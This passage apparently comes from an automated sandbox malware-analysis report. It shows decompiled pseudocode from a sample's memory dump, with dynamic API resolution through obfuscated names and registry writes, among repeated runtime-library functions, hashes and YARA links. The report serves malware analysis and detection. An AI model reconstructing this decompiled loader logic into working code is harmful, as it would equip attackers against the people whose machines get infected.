						} else {
							_t33 =  *0x75d2e0; // 0x25ca5a8
							_t7 = _t33 + 0x75e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x75d2e0; // 0x25ca5a8
								_t9 = _t36 + 0x75e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x75d2e0; // 0x25ca5a8
									_t11 = _t39 + 0x75e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00759269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00754846
0x0075484a
0x0075490c
0x00754850
0x00754850
0x00754855
0x00754868
0x0075486a
0x0075486f
0x00754877
0x0075487e
0x00754880
0x00754885
0x00754904
0x00754905
0x00754887
0x00754887
0x0075488c
0x00754894
0x00754896
0x0075489b
0x00000000
0x0075489d
0x0075489d
0x007548a2
0x007548aa
0x007548ac
0x007548b1
0x00000000
0x007548b3
0x007548b3
0x007548b8
0x007548c0
0x007548c2
0x007548c7
0x00000000
0x007548c9
0x007548c9
0x007548ce
0x007548d6
0x007548d8
0x007548dd
0x00000000
0x007548df
0x007548e5
0x007548ea
0x007548f1
0x007548f6
0x007548fb
0x00000000
0x007548fd
0x00754900
0x00754900
0x007548fb
0x007548dd
0x007548c7
0x007548b1
0x0075489b
0x00754885
0x0075491a

APIs

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0075101C,?,00000001,?,?,00000000,00000000), ref: 0075485C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 0075487E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00754894
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007548AA
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007548C0
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007548D6

Part of subcall function 00759269: memset.NTDLL ref: 007592E8

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 563f23728bbf25520834051fd5b19988c01459e10328a411932299b817d8e651
Instruction ID: d1da1d3eeac67fbf21add036fa20316269009a64f31a51810ed11fcff7ebcb55
Opcode Fuzzy Hash: 563f23728bbf25520834051fd5b19988c01459e10328a411932299b817d8e651
Instruction Fuzzy Hash: DA212CB150074AAFD720DF69DC49DAB77ECFB08346B004455E949C7211D7BCEA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6ED0E172
_Maklocstr.LIBCPMT ref: 6ED0E1DB
_Maklocstr.LIBCPMT ref: 6ED0E1ED
_Maklocchr.LIBCPMT ref: 6ED0E205
_Maklocchr.LIBCPMT ref: 6ED0E215
_Getvals.LIBCPMT ref: 6ED0E237

Part of subcall function 6ED0688C: _Maklocchr.LIBCPMT ref: 6ED068BB
Part of subcall function 6ED0688C: _Maklocchr.LIBCPMT ref: 6ED068D1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID:
API String ID: 3549167292-0
Opcode ID: adfdfd2f020a5cc4b079e084c1a894e8dea13a0752e3e5cce7cb128efbb10f28
Instruction ID: a92b7b17b26ff5cdb26924c7a6e91ccb782cf978d80872306094d73948277b7d
Opcode Fuzzy Hash: adfdfd2f020a5cc4b079e084c1a894e8dea13a0752e3e5cce7cb128efbb10f28
Instruction Fuzzy Hash: DB213D71D00218AADF14EFE5D844ACF7BACEF05714F04885AF9199F285EB709644CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED074E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED074EB
std::_Lockit::_Lockit.LIBCPMT ref: 6ED074F5
int.LIBCPMT ref: 6ED0750C

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07546
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07566
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07573

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8c3e069e060a26826c9ccd5faf0f279c5ef40bd2214ef0ee21af737ff2fa2501
Instruction ID: 5e6c9f6a940994c088300341f75541378beeeb2d77dbb543bfc84697e917fe7b
Opcode Fuzzy Hash: 8c3e069e060a26826c9ccd5faf0f279c5ef40bd2214ef0ee21af737ff2fa2501
Instruction Fuzzy Hash: B701843190451ADBCF05DFE4D988AED777A7F85328F180909D4116B3D0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07456
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07460
int.LIBCPMT ref: 6ED07477

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED074B1
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED074D1
Concurrency::cancel_current_task.LIBCPMT ref: 6ED074DE

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 28ca382580d1dedc90a5bbbf83f9b47d36bf8a8a482c5a00443a9cdfee2ee52c
Instruction ID: 5de2c85203e0b00529765fae82377488c1533ec2254163b7a230a8cb58003d3f
Opcode Fuzzy Hash: 28ca382580d1dedc90a5bbbf83f9b47d36bf8a8a482c5a00443a9cdfee2ee52c
Instruction Fuzzy Hash: 9201AD3190462AAFCB05DFE4C954AED7B7AAF81728F280819E4106B2C0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07C86
int.LIBCPMT ref: 6ED07C9D

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07CD7
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07CF7
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07D04

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 6667429d0903dc411fad867c9ffea50927e7ef9d84ce38aa5ab4b86a3979ade8
Instruction ID: d5ab7edc0eb2a641a6669fff37fbdb81d6b9c6737d5ee959721e527180a002f0
Opcode Fuzzy Hash: 6667429d0903dc411fad867c9ffea50927e7ef9d84ce38aa5ab4b86a3979ade8
Instruction Fuzzy Hash: 0601C03590461AEFCF05DFE4C945AEE7779AF85328F280809D8206B3C0DF709A458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01C08
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01C12
int.LIBCPMT ref: 6ED01C29

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED01C63
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01C83
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01C90

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 48efc32af05d5af51145ddcf3db00cdcd2ff8f22faa9cc287c79104f8a99a079
Instruction ID: c5d16d25d555e4f6413b19d0eefa784e63192304cbd32443f19cc292a899c917
Opcode Fuzzy Hash: 48efc32af05d5af51145ddcf3db00cdcd2ff8f22faa9cc287c79104f8a99a079
Instruction Fuzzy Hash: 8201C03190052A9BCF45CFE0C984AEEB779AF8536CF180919E4106B2C0DF70DA098BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07580
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0758A
int.LIBCPMT ref: 6ED075A1

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED075DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED075FB
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07608

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3492ac73eead1a0c346c7aec3653b88b7987e2c45f8b9d3d768375d0944c588c
Instruction ID: 59fe495e7044e149540e1557e16466f8b9ac91efe059b503ed9428e95f846a01
Opcode Fuzzy Hash: 3492ac73eead1a0c346c7aec3653b88b7987e2c45f8b9d3d768375d0944c588c
Instruction Fuzzy Hash: 9C01803190051A9FCF06DFE4C949AEEB77ABF85328F184919D4216B3D0DF74DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07D11
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07D1B
int.LIBCPMT ref: 6ED07D32

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07D6C
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07D8C
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07D99

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: a288284caead9de523f0d5a7d7e9049e8bd14e21474313b095993dfdffd83572
Instruction ID: e6c90d1112adf2f01535caf00a0c6a925ca39c50107c715bbc5205cd49f922a2
Opcode Fuzzy Hash: a288284caead9de523f0d5a7d7e9049e8bd14e21474313b095993dfdffd83572
Instruction Fuzzy Hash: 2C016D7590051AEBCB05DFE4C954AFDB779BF85328F280909D4116B2D0DB709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07A28
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07A32
int.LIBCPMT ref: 6ED07A49

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07A83
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07AA3
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07AB0

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 016d6cf9657cdc7e6cdc3737bfedb7dc39aca801eada08c1944720c54733677f
Instruction ID: 62ce9de0cce421fc3a37ec9c3b0ebee18cdb4721b0a0fb3418dcb9dfb7a372af
Opcode Fuzzy Hash: 016d6cf9657cdc7e6cdc3737bfedb7dc39aca801eada08c1944720c54733677f
Instruction Fuzzy Hash: 9301C03190461AAFCF05DFE4C984AEE777AAF81728F280909E4156B3C0DF709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07BE7
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07BF1
int.LIBCPMT ref: 6ED07C08

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07C42
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07C62
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07C6F

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 1c702698e08f2b57fcbebe266190a955dca8388937d673b6daf59a8681d44945
Instruction ID: de6b204bce352f29ca8f92de1a23f47a9605702525d3b23e8bc01161dcff4153
Opcode Fuzzy Hash: 1c702698e08f2b57fcbebe266190a955dca8388937d673b6daf59a8681d44945
Instruction Fuzzy Hash: 0F01C03190051AAFCF05EFE4C984AEE77BAAF85318F180909D4106B3C0DF71DE058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED073BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED073C1
std::_Lockit::_Lockit.LIBCPMT ref: 6ED073CB
int.LIBCPMT ref: 6ED073E2

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED0741C
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0743C
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07449

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4d2c9a1df481521445afc7e2c58b13ca3169bb4c0dcde2a38e9a79f4990fd3b8
Instruction ID: 3b98ef6b10703a34829ff357ec43130a4ed642e2411b65bb15ba53345dfac30e
Opcode Fuzzy Hash: 4d2c9a1df481521445afc7e2c58b13ca3169bb4c0dcde2a38e9a79f4990fd3b8
Instruction Fuzzy Hash: 2D01C07190051AEFCF05DFE4C944AEE7B7AAF8132CF284809D4106B2D0DF70DA069BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01B73
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01B7D
int.LIBCPMT ref: 6ED01B94

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED01BCE
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01BEE
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01BFB

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: ddfc998cc1934e4ef649520564ed914a9f32502255647610865bc95b1dd000c1
Instruction ID: 21711d0af93ac044845c04a90e35331edb952ea6d3852fc0128b82b39e0ca83b
Opcode Fuzzy Hash: ddfc998cc1934e4ef649520564ed914a9f32502255647610865bc95b1dd000c1
Instruction Fuzzy Hash: EC01C03190451A9FCF05DFE4CA94AEE7779AF8131CF184909E4106B3C0EF70DA0A9BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07869
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07873
int.LIBCPMT ref: 6ED0788A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED078C4
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED078E4
Concurrency::cancel_current_task.LIBCPMT ref: 6ED078F1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 7ed3ab0b34d80fa0af8fc9b20246fcefec9105ac74f7448fca8c457aa32f0be3
Instruction ID: cd5a68cb352b2ed020119e0e1580a80e8d746f5a0a16c5e1fcab0b118c66de47
Opcode Fuzzy Hash: 7ed3ab0b34d80fa0af8fc9b20246fcefec9105ac74f7448fca8c457aa32f0be3
Instruction Fuzzy Hash: 21016D31D0061AABCF05DFE4C994AED7779AF85728F280909D4116F3D0DB749A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07993
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0799D
int.LIBCPMT ref: 6ED079B4

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED079EE
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07A0E
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07A1B

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f4b9e7e92d71c45a61d293261c2673d8a46e5160bcfad0487459b50dc1314164
Instruction ID: 6620aebc337d8f0a08d5e91acf4f28eb719744be1799038c05bf1a4fb9172137
Opcode Fuzzy Hash: f4b9e7e92d71c45a61d293261c2673d8a46e5160bcfad0487459b50dc1314164
Instruction Fuzzy Hash: 8F01AD7190051AABCF05DFE4C944AEE7B79AF81728F184C09E4106B2C0DB70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0075282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0075282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x75d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00751922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00755C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00754AAB(_a8);
						goto L29;
					}
					_t64 =  *0x75d2b0; // 0x2d29b38
					_t16 = _t64 + 0xc; // 0x2d29c06
					_t65 = E00751922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0075c0
						if(E00754A6D(_t97,  *_t33, _t91, _a8,  *0x75d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x75d2e0; // 0x25ca5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x75ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x75ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00755F64(_t69,  *0x75d374,  *0x75d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x75d2e0; // 0x25ca5a8
									_t44 = _t71 + 0x75e83e; // 0x74666f53
									_t73 = E00751922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0075c0
										E00755DDA( *_t47, _t91, _a8,  *0x75d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d0075c0
										E00755DDA( *_t49, _t91, _t99,  *0x75d370, _a16);
										E00754AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0075c0
									E00755DDA( *_t40, _t91, _a8,  *0x75d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d0075c0
									E00755DDA( *_t43, _t91, _a8,  *0x75d370, _a16);
								}
								if( *_t101 != 0) {
									E00754AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0075c0
					_t81 = E007563F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0075c0
							E00754A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00754AAB(_t100);
						_t98 = _a16;
					}
					E00754AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0075A938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x75d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x0075282b
0x00752834
0x0075283b
0x00752840
0x007528ad
0x007528b3
0x007528b8
0x007528bf
0x007528c4
0x007528c9
0x00752a34
0x00752a3b
0x00752a3b
0x00752a40
0x00752a42
0x00752a42
0x00752a4b
0x00752a4b
0x007528cf
0x007528db
0x00752a2a
0x00752a2d
0x00000000
0x00752a2d
0x007528e1
0x007528e6
0x007528e9
0x007528ee
0x007528f3
0x0075293c
0x0075293c
0x0075294f
0x00752959
0x0075295f
0x00752966
0x00752970
0x00752970
0x00752968
0x00752968
0x00752968
0x00752968
0x00752992
0x0075299a
0x007529c8
0x007529cd
0x007529d4
0x007529d9
0x007529dd
0x00752a0f
0x007529df
0x007529ec
0x007529ef
0x007529ff
0x00752a02
0x00752a08
0x00752a08
0x0075299c
0x007529a9
0x007529ac
0x007529be
0x007529c1
0x007529c1
0x00752a19
0x00752a25
0x00752a1b
0x00752a1e
0x00752a1e
0x00752a19
0x00752992
0x00000000
0x00752959
0x00752902
0x00752905
0x0075290c
0x00752912
0x00752915
0x00752917
0x00752923
0x00752926
0x00752926
0x0075292c
0x00752931
0x00752931
0x00752937
0x00000000
0x00752937
0x00752845
0x00000000
0x0075286c
0x0075286c
0x00752878
0x0075288b
0x00752891
0x00752899
0x00000000
0x00752899

APIs

StrChrA.SHLWAPI(00752197,0000005F,00000000,00000000,00000104), ref: 0075285E
lstrcpy.KERNEL32(?,?), ref: 0075288B

Part of subcall function 00751922: lstrlen.KERNEL32(?,00000000,02D29B38,00000000,007574FF,02D29D16,?,?,?,?,?,69B25F44,00000005,0075D00C), ref: 00751929
Part of subcall function 00751922: mbstowcs.NTDLL ref: 00751952
Part of subcall function 00751922: memset.NTDLL ref: 00751964

Part of subcall function 00755DDA: lstrlenW.KERNEL32(?,?,?,007529F4,3D0075C0,80000002,00752197,0075258B,74666F53,4D4C4B48,0075258B,?,3D0075C0,80000002,00752197,?), ref: 00755DFF

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

lstrcpy.KERNEL32(?,00000000), ref: 007528AD

Strings

(, xrefs: 0075290E
\, xrefs: 00752891

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 193ce2144fb4fd3e192c25fbd781236533edfe5748be49b04bae19c0529b3e08
Instruction ID: 34f7611d7c1e199404b049ea8dba191de66f37f891a00c5c1195018d6c37803c
Opcode Fuzzy Hash: 193ce2144fb4fd3e192c25fbd781236533edfe5748be49b04bae19c0529b3e08
Instruction Fuzzy Hash: E6515A72100609EFDF229F60DC44EEA37B9FB19306F10C514FD1592162D7BAEE5A9B11

Uniqueness

Uniqueness Score: -1.00%

Function 0075577D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0075577D(void* __ecx, void* __edx, char _a4, void** _a8, char _a12, char _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x75d380; // 0x2d29b28
				_push(0x800);
				_push(0);
				_push( *0x75d270);
				if( *0x75d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x75d284 =  *0x75d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t8 =  &_a16; // 0x75553a
						_t40 = _v8;
						 *((intOrPtr*)( *_t8)) = _a4;
						 *_a20 = E0075789B(_t44, _t40);
						_t18 = E00753720(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							_t12 =  &_a12; // 0x75553a
							 *((intOrPtr*)( *_t12)) = _t18;
							if( *0x75d284 < 5) {
